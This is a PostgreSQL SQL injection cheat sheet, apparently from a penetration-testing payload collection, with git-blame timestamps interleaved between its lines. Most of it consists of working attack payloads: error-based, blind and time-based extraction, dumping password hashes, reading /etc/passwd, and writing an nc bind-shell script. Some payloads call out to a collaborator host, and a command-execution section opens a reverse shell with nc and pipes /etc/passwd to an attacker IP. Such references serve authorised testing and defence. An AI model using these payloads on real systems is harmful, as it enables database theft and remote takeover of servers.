2024-11-10 19:49:52 +00:00
# PostgreSQL Injection
2024-11-15 22:56:04 +00:00
> PostgreSQL SQL injection refers to a type of security vulnerability where attackers exploit improperly sanitized user input to execute unauthorized SQL commands within a PostgreSQL database.
2024-11-10 19:49:52 +00:00
2019-06-29 17:23:34 +00:00
## Summary
* [PostgreSQL Comments ](#postgresql-comments )
2024-11-15 22:56:04 +00:00
* [PostgreSQL Enumeration ](#postgresql-enumeration )
2024-11-16 17:49:01 +00:00
* [PostgreSQL Methodology ](#postgresql-methodology )
2019-06-29 17:23:34 +00:00
* [PostgreSQL Error Based ](#postgresql-error-based )
2024-11-15 22:56:04 +00:00
* [PostgreSQL XML Helpers ](#postgresql-xml-helpers )
2019-06-29 17:23:34 +00:00
* [PostgreSQL Blind ](#postgresql-blind )
2024-11-16 14:35:43 +00:00
* [PostgreSQL Blind With Substring Equivalent ](#postgresql-blind-with-substring-equivalent )
2019-06-29 17:23:34 +00:00
* [PostgreSQL Time Based ](#postgresql-time-based )
2024-11-15 22:56:04 +00:00
* [PostgreSQL Out of Band ](#postgresql-out-of-band )
2024-11-10 19:49:52 +00:00
* [PostgreSQL Stacked Query ](#postgresql-stacked-query )
2024-11-15 22:56:04 +00:00
* [PostgreSQL File Manipulation ](#postgresql-file-manipulation )
* [PostgreSQL File Read ](#postgresql-file-read )
* [PostgreSQL File Write ](#postgresql-file-write )
2024-11-10 19:49:52 +00:00
* [PostgreSQL Command Execution ](#postgresql-command-execution )
2024-11-15 22:56:04 +00:00
* [Using COPY TO/FROM PROGRAM ](#using-copy-tofrom-program )
2019-10-29 13:36:41 +00:00
* [Using libc.so.6 ](#using-libcso6 )
2024-11-15 22:56:04 +00:00
* [PostgreSQL WAF Bypass ](#postgresql-waf-bypass )
* [Alternative to Quotes ](#alternative-to-quotes )
2024-11-16 17:49:01 +00:00
* [PostgreSQL Privileges ](#postgresql-privileges )
* [PostgreSQL List Privileges ](#postgresql-list-privileges )
* [PostgreSQL Superuser Role ](#postgresql-superuser-role )
2019-06-29 17:23:34 +00:00
* [References ](#references )
2016-11-29 16:27:35 +00:00
2024-11-10 19:49:52 +00:00
2018-05-20 20:10:33 +00:00
## PostgreSQL Comments
2018-08-12 21:30:22 +00:00
2024-11-16 17:49:01 +00:00
| Type | Comment |
| ------------------- | ------- |
| Single-Line Comment | `--` |
| Multi-Line Comment | `/**/` |
2019-10-28 10:56:49 +00:00
2024-11-16 17:49:01 +00:00
## PostgreSQL Enumeration
2019-10-28 10:56:49 +00:00
2024-11-16 17:49:01 +00:00
| Description | SQL Query |
| ---------------------- | --------------------------------------- |
| DBMS version | `SELECT version()` |
| Database Name | `SELECT CURRENT_DATABASE()` |
| Database Schema | `SELECT CURRENT_SCHEMA()` |
| List PostgreSQL Users | `SELECT usename FROM pg_user` |
| List Password Hashes | `SELECT usename, passwd FROM pg_shadow` |
| List DB Administrators | `SELECT usename FROM pg_user WHERE usesuper IS TRUE` |
| Current User | `SELECT user;` |
| Current User | `SELECT current_user;` |
| Current User | `SELECT session_user;` |
| Current User | `SELECT usename FROM pg_user;` |
| Current User | `SELECT getpgusername();` |
## PostgreSQL Methodology
| Description | SQL Query |
| ---------------------- | -------------------------------------------- |
| List Schemas | `SELECT DISTINCT(schemaname) FROM pg_tables` |
| List Databases | `SELECT datname FROM pg_database` |
| List Tables | `SELECT table_name FROM information_schema.tables` |
| List Tables | `SELECT table_name FROM information_schema.tables WHERE table_schema='<SCHEMA_NAME>'` |
| List Tables | `SELECT tablename FROM pg_tables WHERE schemaname = '<SCHEMA_NAME>'` |
| List Columns | `SELECT column_name FROM information_schema.columns WHERE table_name='data_table'` |
2021-01-24 17:39:52 +00:00
2024-11-16 17:49:01 +00:00
## PostgreSQL Error Based
2019-10-28 10:56:49 +00:00
2024-11-16 17:49:01 +00:00
| Name | Payload |
| ------------ | --------------- |
| CAST | `AND 1337=CAST('~'\|\|(SELECT version())::text\|\|'~' AS NUMERIC) -- -` |
| CAST | `AND (CAST('~'\|\|(SELECT version())::text\|\|'~' AS NUMERIC)) -- -` |
| CAST | `AND CAST((SELECT version()) AS INT)=1337 -- -` |
| CAST | `AND (SELECT version())::int=1 -- -` |
2019-10-28 10:56:49 +00:00
2018-08-12 21:30:22 +00:00
```sql
2024-11-16 17:49:01 +00:00
CAST(chr(126)||VERSION()||chr(126) AS NUMERIC)
CAST(chr(126)||(SELECT table_name FROM information_schema.tables LIMIT 1 offset data_offset)||chr(126) AS NUMERIC)--
CAST(chr(126)||(SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset)||chr(126) AS NUMERIC)--
CAST(chr(126)||(SELECT data_column FROM data_table LIMIT 1 offset data_offset)||chr(126) AS NUMERIC)
2024-11-15 22:56:04 +00:00
```
2019-10-26 12:37:14 +00:00
2024-11-15 22:56:04 +00:00
```sql
2019-10-26 12:37:14 +00:00
' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1
' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1
2018-05-16 21:33:14 +00:00
```
2024-11-15 22:56:04 +00:00
### PostgreSQL XML Helpers
2020-05-05 03:10:44 +00:00
```sql
2024-11-16 17:49:01 +00:00
SELECT query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row
2020-05-05 03:10:44 +00:00
```
The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based ](#postgresql-error-based ) technique to exfiltrate data without having to worry about `LIMIT` ing your query to one result.
```sql
2024-11-16 17:49:01 +00:00
SELECT database_to_xml(true,true,''); -- dump the current database to XML
SELECT database_to_xmlschema(true,true,''); -- dump the current db to an XML schema
2020-05-05 03:10:44 +00:00
```
Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition.
2024-11-10 19:49:52 +00:00
2019-06-29 17:23:34 +00:00
## PostgreSQL Blind
2024-11-16 14:35:43 +00:00
### PostgreSQL Blind With Substring Equivalent
| Function | Example |
| ----------- | ----------------------------------------------- |
| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
| `SUBSTRING` | `SUBSTRING('foobar' FROM <START> FOR <LENGTH>)` |
Examples:
2019-06-29 17:23:34 +00:00
```sql
2024-11-15 22:56:04 +00:00
' and substr(version(),1,10) = 'PostgreSQL' and '1 -- TRUE
' and substr(version(),1,10) = 'PostgreXXX' and '1 -- FALSE
2019-06-29 17:23:34 +00:00
```
2024-11-16 14:35:43 +00:00
2018-05-16 21:33:14 +00:00
## PostgreSQL Time Based
2024-11-07 19:54:16 +00:00
2024-11-10 19:49:52 +00:00
#### Identify Time Based
2022-09-10 12:56:31 +00:00
```sql
select 1 from pg_sleep(5)
;(select 1 from pg_sleep(5))
||(select 1 from pg_sleep(5))
```
2024-11-10 19:49:52 +00:00
#### Database Dump Time Based
2022-09-10 12:56:31 +00:00
```sql
select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
```
2024-11-10 19:49:52 +00:00
#### Table Dump Time Based
2022-09-10 12:56:31 +00:00
```sql
select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
```
2024-11-10 19:49:52 +00:00
#### Columns Dump Time Based
2022-09-10 12:56:31 +00:00
```sql
2023-01-04 05:02:57 +00:00
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name where column_name='value' limit 1
2022-09-10 12:56:31 +00:00
```
2018-08-12 21:30:22 +00:00
```sql
2024-11-16 17:49:01 +00:00
AND 'RANDSTR'||PG_SLEEP(10)='RANDSTR'
2018-05-16 21:33:14 +00:00
AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
2018-08-12 21:30:22 +00:00
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
2018-09-01 13:36:33 +00:00
```
2024-11-15 22:56:04 +00:00
## PostgreSQL Out of Band
2019-10-28 10:56:49 +00:00
2024-11-15 22:56:04 +00:00
Out-of-band SQL injections in PostgreSQL relies on the use of functions that can interact with the file system or network, such as `COPY` , `lo_export` , or functions from extensions that can perform network actions. The idea is to exploit the database to send data elsewhere, which the attacker can monitor and intercept.
2019-10-28 10:56:49 +00:00
```sql
2024-11-15 22:56:04 +00:00
declare c text;
declare p text;
begin
SELECT into p (SELECT YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN''';
execute c;
END;
$$ language plpgsql security definer;
SELECT f();
2019-10-28 10:56:49 +00:00
```
2024-11-10 19:49:52 +00:00
2024-11-15 22:56:04 +00:00
## PostgreSQL Stacked Query
Use a semi-colon "`;`" to add another query
2018-09-01 13:36:33 +00:00
```sql
2024-11-15 22:56:04 +00:00
SELECT 1;CREATE TABLE NOTSOSECURE (DATA VARCHAR(200));--
2018-09-01 13:36:33 +00:00
```
2019-02-17 19:02:16 +00:00
2024-11-15 22:56:04 +00:00
## PostgreSQL File Manipulation
2018-09-01 13:36:33 +00:00
2024-11-15 22:56:04 +00:00
### PostgreSQL File Read
2020-05-05 03:10:44 +00:00
2024-11-15 22:56:04 +00:00
NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir` . Newer versions (as of [0fdc8495bff02684142a44ab3bc5b18a8ca1863a ](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a ) commit) will allow reading any file/filepath for super users or users in the `default_role_read_server_files` group.
2018-09-01 13:36:33 +00:00
2024-11-15 22:56:04 +00:00
* Using `pg_read_file` , `pg_ls_dir`
2018-09-01 13:36:33 +00:00
2024-11-15 22:56:04 +00:00
```sql
select pg_ls_dir('./');
select pg_read_file('PG_VERSION', 0, 200);
```
* Using `COPY`
```sql
CREATE TABLE temp(t TEXT);
COPY temp FROM '/etc/passwd';
SELECT * FROM temp limit 1 offset 0;
```
* Using `lo_import`
```sql
SELECT lo_import('/etc/passwd'); -- will create a large object from the file and return the OID
SELECT lo_get(16420); -- use the OID returned from the above
SELECT * from pg_largeobject; -- or just get all the large objects and their data
```
### PostgreSQL File Write
* Using `COPY`
```sql
CREATE TABLE nc (t TEXT);
INSERT INTO nc(t) VALUES('nc -lvvp 2346 -e /bin/bash');
SELECT * FROM nc;
COPY nc(t) TO '/tmp/nc.sh';
```
* Using `COPY` (one-line)
```sql
COPY (SELECT 'nc -lvvp 2346 -e /bin/bash') TO '/tmp/pentestlab';
```
* Using `lo_from_bytea` , `lo_put` and `lo_export`
```sql
SELECT lo_from_bytea(43210, 'your file data goes in here'); -- create a large object with OID 43210 and some data
SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at offset 20
SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport
```
2021-01-30 14:17:35 +00:00
2020-05-05 03:10:44 +00:00
2024-11-10 19:49:52 +00:00
## PostgreSQL Command Execution
2019-03-24 15:00:27 +00:00
2024-11-15 22:56:04 +00:00
### Using COPY TO/FROM PROGRAM
2019-07-01 21:29:29 +00:00
2024-11-15 22:56:04 +00:00
Installations running Postgres 9.3 and above have functionality which allows for the superuser and users with '`pg_execute_server_program`' to pipe to and from an external program using `COPY` .
```sql
COPY (SELECT '') to PROGRAM 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
```
2019-03-24 15:00:27 +00:00
2024-11-15 22:56:04 +00:00
```sql
CREATE TABLE shell(output text);
COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>& 1|nc 10.0.0.1 1234 >/tmp/f';
2019-03-24 15:00:27 +00:00
```
2019-07-01 21:29:29 +00:00
### Using libc.so.6
```sql
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('cat /etc/passwd | nc < attacker IP > < attacker port > ');
```
2020-07-12 05:14:26 +00:00
2024-11-16 17:49:01 +00:00
## PostgreSQL WAF Bypass
2020-07-12 05:14:26 +00:00
2024-11-16 17:49:01 +00:00
### Alternative to Quotes
2020-07-12 05:14:26 +00:00
2024-11-15 22:56:04 +00:00
| Payload | Technique |
| ------------------ | --------- |
| `SELECT CHR(65)\|\|CHR(66)\|\|CHR(67);` | String from `CHR()` |
| `SELECT $TAG$This` | Dollar-sign ( >= version 8 PostgreSQL) |
2020-07-12 05:14:26 +00:00
2024-11-16 17:49:01 +00:00
## PostgreSQL Privileges
### PostgreSQL List Privileges
Retrieve all table-level privileges for the current user, excluding tables in system schemas like `pg_catalog` and `information_schema` .
```sql
SELECT * FROM information_schema.role_table_grants WHERE grantee = current_user AND table_schema NOT IN ('pg_catalog', 'information_schema');
```
### PostgreSQL Superuser Role
```sql
SHOW is_superuser;
SELECT current_setting('is_superuser');
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
```
2018-12-24 14:02:50 +00:00
## References
2018-09-01 13:36:33 +00:00
2024-11-03 13:06:53 +00:00
- [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017 ](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9 )
- [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - Leon Juranic - June 17, 2009 ](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf )
- [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - GreenWolf - March 20, 2019 ](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5 )
- [Postgres SQL Injection Cheat Sheet - @pentestmonkey - August 23, 2011 ](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet )
- [PostgreSQL 9.x Remote Command Execution - dionach - October 26, 2017 ](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/ )
- [SQL Injection /webApp/oma_conf ctx parameter - Sergey Bobrov (bobrov) - December 8, 2016 ](https://hackerone.com/reports/181803 )
2024-11-07 14:12:58 +00:00
- [SQL Injection and Postgres - An Adventure to Eventual RCE - Denis Andzakovic - May 5, 2020 ](https://pulsesecurity.co.nz/articles/postgres-sqli )